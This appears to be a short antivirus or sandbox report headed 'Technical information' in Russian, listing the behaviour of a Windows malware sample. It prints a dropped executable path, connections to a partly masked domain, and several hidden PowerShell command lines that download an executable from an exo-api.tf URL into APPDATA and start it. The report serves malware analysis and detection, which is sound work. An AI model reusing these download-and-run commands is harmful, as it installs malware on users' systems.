Техническая информация
- %APPDATA%\bk754838.exe
- 'ex##api.tf':443
- 'ex##api.tf':443
- DNS ASK ex##api.tf
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api.tf/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:APPDATA\BK754838.exe; Start-Proce...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api.tf/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:APPDATA\BK754838.exe; Start-Process -FilePath $env:APPD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api.tf/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:APPDATA\BK754838.exe; Start-Process -FilePath $env:APPDATA\BK754838.e...